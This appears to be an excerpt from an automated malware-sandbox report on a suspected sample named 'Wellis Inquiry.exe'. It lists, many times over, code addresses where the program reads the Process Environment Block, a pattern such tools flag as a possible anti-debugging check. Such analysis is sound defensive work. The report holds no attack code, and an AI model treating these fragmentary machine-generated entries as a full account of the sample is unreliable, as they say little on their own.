Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E002D mov eax, dword ptr fs:[00000030h]	3_2_011E002D
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E002D mov eax, dword ptr fs:[00000030h]	3_2_011E002D
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E002D mov eax, dword ptr fs:[00000030h]	3_2_011E002D
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01237016 mov eax, dword ptr fs:[00000030h]	3_2_01237016
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01237016 mov eax, dword ptr fs:[00000030h]	3_2_01237016
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01237016 mov eax, dword ptr fs:[00000030h]	3_2_01237016
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011CB02A mov eax, dword ptr fs:[00000030h]	3_2_011CB02A
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011CB02A mov eax, dword ptr fs:[00000030h]	3_2_011CB02A
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011CB02A mov eax, dword ptr fs:[00000030h]	3_2_011CB02A
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011CB02A mov eax, dword ptr fs:[00000030h]	3_2_011CB02A
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01284015 mov eax, dword ptr fs:[00000030h]	3_2_01284015
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01284015 mov eax, dword ptr fs:[00000030h]	3_2_01284015
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011D0050 mov eax, dword ptr fs:[00000030h]	3_2_011D0050
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011D0050 mov eax, dword ptr fs:[00000030h]	3_2_011D0050
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01272073 mov eax, dword ptr fs:[00000030h]	3_2_01272073
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01281074 mov eax, dword ptr fs:[00000030h]	3_2_01281074
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011B9080 mov eax, dword ptr fs:[00000030h]	3_2_011B9080
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011EF0BF mov ecx, dword ptr fs:[00000030h]	3_2_011EF0BF
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011EF0BF mov eax, dword ptr fs:[00000030h]	3_2_011EF0BF
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011EF0BF mov eax, dword ptr fs:[00000030h]	3_2_011EF0BF
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01233884 mov eax, dword ptr fs:[00000030h]	3_2_01233884
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01233884 mov eax, dword ptr fs:[00000030h]	3_2_01233884
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F90AF mov eax, dword ptr fs:[00000030h]	3_2_011F90AF
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E20A0 mov eax, dword ptr fs:[00000030h]	3_2_011E20A0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E20A0 mov eax, dword ptr fs:[00000030h]	3_2_011E20A0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E20A0 mov eax, dword ptr fs:[00000030h]	3_2_011E20A0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E20A0 mov eax, dword ptr fs:[00000030h]	3_2_011E20A0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E20A0 mov eax, dword ptr fs:[00000030h]	3_2_011E20A0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E20A0 mov eax, dword ptr fs:[00000030h]	3_2_011E20A0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0124B8D0 mov eax, dword ptr fs:[00000030h]	3_2_0124B8D0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0124B8D0 mov ecx, dword ptr fs:[00000030h]	3_2_0124B8D0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0124B8D0 mov eax, dword ptr fs:[00000030h]	3_2_0124B8D0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0124B8D0 mov eax, dword ptr fs:[00000030h]	3_2_0124B8D0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0124B8D0 mov eax, dword ptr fs:[00000030h]	3_2_0124B8D0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0124B8D0 mov eax, dword ptr fs:[00000030h]	3_2_0124B8D0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011B58EC mov eax, dword ptr fs:[00000030h]	3_2_011B58EC
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011B40E1 mov eax, dword ptr fs:[00000030h]	3_2_011B40E1
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011B40E1 mov eax, dword ptr fs:[00000030h]	3_2_011B40E1
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011B40E1 mov eax, dword ptr fs:[00000030h]	3_2_011B40E1
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0127131B mov eax, dword ptr fs:[00000030h]	3_2_0127131B
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011BF358 mov eax, dword ptr fs:[00000030h]	3_2_011BF358
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011BDB40 mov eax, dword ptr fs:[00000030h]	3_2_011BDB40
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E3B7A mov eax, dword ptr fs:[00000030h]	3_2_011E3B7A
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E3B7A mov eax, dword ptr fs:[00000030h]	3_2_011E3B7A
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01288B58 mov eax, dword ptr fs:[00000030h]	3_2_01288B58
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011BDB60 mov ecx, dword ptr fs:[00000030h]	3_2_011BDB60
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E2397 mov eax, dword ptr fs:[00000030h]	3_2_011E2397
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01285BA5 mov eax, dword ptr fs:[00000030h]	3_2_01285BA5
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011EB390 mov eax, dword ptr fs:[00000030h]	3_2_011EB390
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011C1B8F mov eax, dword ptr fs:[00000030h]	3_2_011C1B8F
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011C1B8F mov eax, dword ptr fs:[00000030h]	3_2_011C1B8F
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0126D380 mov ecx, dword ptr fs:[00000030h]	3_2_0126D380
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0127138A mov eax, dword ptr fs:[00000030h]	3_2_0127138A
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E4BAD mov eax, dword ptr fs:[00000030h]	3_2_011E4BAD
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E4BAD mov eax, dword ptr fs:[00000030h]	3_2_011E4BAD
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E4BAD mov eax, dword ptr fs:[00000030h]	3_2_011E4BAD
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_012353CA mov eax, dword ptr fs:[00000030h]	3_2_012353CA
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_012353CA mov eax, dword ptr fs:[00000030h]	3_2_012353CA
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011DDBE9 mov eax, dword ptr fs:[00000030h]	3_2_011DDBE9
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E03E2 mov eax, dword ptr fs:[00000030h]	3_2_011E03E2
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E03E2 mov eax, dword ptr fs:[00000030h]	3_2_011E03E2
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E03E2 mov eax, dword ptr fs:[00000030h]	3_2_011E03E2
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E03E2 mov eax, dword ptr fs:[00000030h]	3_2_011E03E2
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E03E2 mov eax, dword ptr fs:[00000030h]	3_2_011E03E2
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E03E2 mov eax, dword ptr fs:[00000030h]	3_2_011E03E2
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011D3A1C mov eax, dword ptr fs:[00000030h]	3_2_011D3A1C
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011B5210 mov eax, dword ptr fs:[00000030h]	3_2_011B5210
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011B5210 mov ecx, dword ptr fs:[00000030h]	3_2_011B5210
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011B5210 mov eax, dword ptr fs:[00000030h]	3_2_011B5210
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011B5210 mov eax, dword ptr fs:[00000030h]	3_2_011B5210
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011BAA16 mov eax, dword ptr fs:[00000030h]	3_2_011BAA16
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011BAA16 mov eax, dword ptr fs:[00000030h]	3_2_011BAA16
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011C8A0A mov eax, dword ptr fs:[00000030h]	3_2_011C8A0A
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0127AA16 mov eax, dword ptr fs:[00000030h]	3_2_0127AA16
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0127AA16 mov eax, dword ptr fs:[00000030h]	3_2_0127AA16
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F4A2C mov eax, dword ptr fs:[00000030h]	3_2_011F4A2C
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F4A2C mov eax, dword ptr fs:[00000030h]	3_2_011F4A2C
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011DA229 mov eax, dword ptr fs:[00000030h]	3_2_011DA229
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011DA229 mov eax, dword ptr fs:[00000030h]	3_2_011DA229
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011DA229 mov eax, dword ptr fs:[00000030h]	3_2_011DA229
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011DA229 mov eax, dword ptr fs:[00000030h]	3_2_011DA229
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011DA229 mov eax, dword ptr fs:[00000030h]	3_2_011DA229
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011DA229 mov eax, dword ptr fs:[00000030h]	3_2_011DA229
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011DA229 mov eax, dword ptr fs:[00000030h]	3_2_011DA229
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011DA229 mov eax, dword ptr fs:[00000030h]	3_2_011DA229
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011DA229 mov eax, dword ptr fs:[00000030h]	3_2_011DA229
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0126B260 mov eax, dword ptr fs:[00000030h]	3_2_0126B260
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0126B260 mov eax, dword ptr fs:[00000030h]	3_2_0126B260
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01288A62 mov eax, dword ptr fs:[00000030h]	3_2_01288A62
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011B9240 mov eax, dword ptr fs:[00000030h]	3_2_011B9240
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011B9240 mov eax, dword ptr fs:[00000030h]	3_2_011B9240
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011B9240 mov eax, dword ptr fs:[00000030h]	3_2_011B9240
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011B9240 mov eax, dword ptr fs:[00000030h]	3_2_011B9240
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F927A mov eax, dword ptr fs:[00000030h]	3_2_011F927A
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0127EA55 mov eax, dword ptr fs:[00000030h]	3_2_0127EA55
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01244257 mov eax, dword ptr fs:[00000030h]	3_2_01244257
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011ED294 mov eax, dword ptr fs:[00000030h]	3_2_011ED294
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011ED294 mov eax, dword ptr fs:[00000030h]	3_2_011ED294
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011CAAB0 mov eax, dword ptr fs:[00000030h]	3_2_011CAAB0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011CAAB0 mov eax, dword ptr fs:[00000030h]	3_2_011CAAB0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011EFAB0 mov eax, dword ptr fs:[00000030h]	3_2_011EFAB0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011B52A5 mov eax, dword ptr fs:[00000030h]	3_2_011B52A5
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011B52A5 mov eax, dword ptr fs:[00000030h]	3_2_011B52A5
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011B52A5 mov eax, dword ptr fs:[00000030h]	3_2_011B52A5
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011B52A5 mov eax, dword ptr fs:[00000030h]	3_2_011B52A5
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011B52A5 mov eax, dword ptr fs:[00000030h]	3_2_011B52A5
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E2ACB mov eax, dword ptr fs:[00000030h]	3_2_011E2ACB
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E2AE4 mov eax, dword ptr fs:[00000030h]	3_2_011E2AE4
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0123A537 mov eax, dword ptr fs:[00000030h]	3_2_0123A537
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01288D34 mov eax, dword ptr fs:[00000030h]	3_2_01288D34
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0127E539 mov eax, dword ptr fs:[00000030h]	3_2_0127E539
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E4D3B mov eax, dword ptr fs:[00000030h]	3_2_011E4D3B
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E4D3B mov eax, dword ptr fs:[00000030h]	3_2_011E4D3B
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E4D3B mov eax, dword ptr fs:[00000030h]	3_2_011E4D3B
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]	3_2_011C3D34
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]	3_2_011C3D34
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]	3_2_011C3D34
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]	3_2_011C3D34
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]	3_2_011C3D34
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]	3_2_011C3D34
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]	3_2_011C3D34
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]	3_2_011C3D34
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]	3_2_011C3D34
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]	3_2_011C3D34
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]	3_2_011C3D34
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]	3_2_011C3D34
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]	3_2_011C3D34
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011BAD30 mov eax, dword ptr fs:[00000030h]	3_2_011BAD30
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011D7D50 mov eax, dword ptr fs:[00000030h]	3_2_011D7D50
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011F3D43 mov eax, dword ptr fs:[00000030h]	3_2_011F3D43
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01233540 mov eax, dword ptr fs:[00000030h]	3_2_01233540
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01263D40 mov eax, dword ptr fs:[00000030h]	3_2_01263D40
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011DC577 mov eax, dword ptr fs:[00000030h]	3_2_011DC577
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011DC577 mov eax, dword ptr fs:[00000030h]	3_2_011DC577
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_012805AC mov eax, dword ptr fs:[00000030h]	3_2_012805AC
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_012805AC mov eax, dword ptr fs:[00000030h]	3_2_012805AC
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011EFD9B mov eax, dword ptr fs:[00000030h]	3_2_011EFD9B
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011EFD9B mov eax, dword ptr fs:[00000030h]	3_2_011EFD9B
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011B2D8A mov eax, dword ptr fs:[00000030h]	3_2_011B2D8A
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011B2D8A mov eax, dword ptr fs:[00000030h]	3_2_011B2D8A
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011B2D8A mov eax, dword ptr fs:[00000030h]	3_2_011B2D8A
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011B2D8A mov eax, dword ptr fs:[00000030h]	3_2_011B2D8A
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011B2D8A mov eax, dword ptr fs:[00000030h]	3_2_011B2D8A
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E2581 mov eax, dword ptr fs:[00000030h]	3_2_011E2581
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E2581 mov eax, dword ptr fs:[00000030h]	3_2_011E2581
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E2581 mov eax, dword ptr fs:[00000030h]	3_2_011E2581
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E2581 mov eax, dword ptr fs:[00000030h]	3_2_011E2581
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E1DB5 mov eax, dword ptr fs:[00000030h]	3_2_011E1DB5
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E1DB5 mov eax, dword ptr fs:[00000030h]	3_2_011E1DB5
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E1DB5 mov eax, dword ptr fs:[00000030h]	3_2_011E1DB5
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E35A1 mov eax, dword ptr fs:[00000030h]	3_2_011E35A1
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0127FDE2 mov eax, dword ptr fs:[00000030h]	3_2_0127FDE2
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0127FDE2 mov eax, dword ptr fs:[00000030h]	3_2_0127FDE2
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0127FDE2 mov eax, dword ptr fs:[00000030h]	3_2_0127FDE2
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0127FDE2 mov eax, dword ptr fs:[00000030h]	3_2_0127FDE2
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01268DF1 mov eax, dword ptr fs:[00000030h]	3_2_01268DF1
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01236DC9 mov eax, dword ptr fs:[00000030h]	3_2_01236DC9
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01236DC9 mov eax, dword ptr fs:[00000030h]	3_2_01236DC9
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01236DC9 mov eax, dword ptr fs:[00000030h]	3_2_01236DC9
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01236DC9 mov ecx, dword ptr fs:[00000030h]	3_2_01236DC9
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01236DC9 mov eax, dword ptr fs:[00000030h]	3_2_01236DC9
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01236DC9 mov eax, dword ptr fs:[00000030h]	3_2_01236DC9
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011CD5E0 mov eax, dword ptr fs:[00000030h]	3_2_011CD5E0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011CD5E0 mov eax, dword ptr fs:[00000030h]	3_2_011CD5E0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]	3_2_01271C06
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]	3_2_01271C06
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]	3_2_01271C06
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]	3_2_01271C06
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]	3_2_01271C06
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]	3_2_01271C06
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]	3_2_01271C06
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]	3_2_01271C06
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]	3_2_01271C06
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]	3_2_01271C06
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]	3_2_01271C06
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]	3_2_01271C06
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]	3_2_01271C06
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]	3_2_01271C06
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0128740D mov eax, dword ptr fs:[00000030h]	3_2_0128740D
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0128740D mov eax, dword ptr fs:[00000030h]	3_2_0128740D
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0128740D mov eax, dword ptr fs:[00000030h]	3_2_0128740D
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01236C0A mov eax, dword ptr fs:[00000030h]	3_2_01236C0A
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01236C0A mov eax, dword ptr fs:[00000030h]	3_2_01236C0A
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01236C0A mov eax, dword ptr fs:[00000030h]	3_2_01236C0A
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01236C0A mov eax, dword ptr fs:[00000030h]	3_2_01236C0A
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011EBC2C mov eax, dword ptr fs:[00000030h]	3_2_011EBC2C
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011EA44B mov eax, dword ptr fs:[00000030h]	3_2_011EA44B
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011D746D mov eax, dword ptr fs:[00000030h]	3_2_011D746D
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0124C450 mov eax, dword ptr fs:[00000030h]	3_2_0124C450
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0124C450 mov eax, dword ptr fs:[00000030h]	3_2_0124C450
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011C849B mov eax, dword ptr fs:[00000030h]	3_2_011C849B
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01236CF0 mov eax, dword ptr fs:[00000030h]	3_2_01236CF0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01236CF0 mov eax, dword ptr fs:[00000030h]	3_2_01236CF0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01236CF0 mov eax, dword ptr fs:[00000030h]	3_2_01236CF0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_012714FB mov eax, dword ptr fs:[00000030h]	3_2_012714FB
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_01288CD6 mov eax, dword ptr fs:[00000030h]	3_2_01288CD6
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011DF716 mov eax, dword ptr fs:[00000030h]	3_2_011DF716
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011EA70E mov eax, dword ptr fs:[00000030h]	3_2_011EA70E
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011EA70E mov eax, dword ptr fs:[00000030h]	3_2_011EA70E
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0128070D mov eax, dword ptr fs:[00000030h]	3_2_0128070D
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0128070D mov eax, dword ptr fs:[00000030h]	3_2_0128070D
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011EE730 mov eax, dword ptr fs:[00000030h]	3_2_011EE730
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0124FF10 mov eax, dword ptr fs:[00000030h]	3_2_0124FF10
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0124FF10 mov eax, dword ptr fs:[00000030h]	3_2_0124FF10
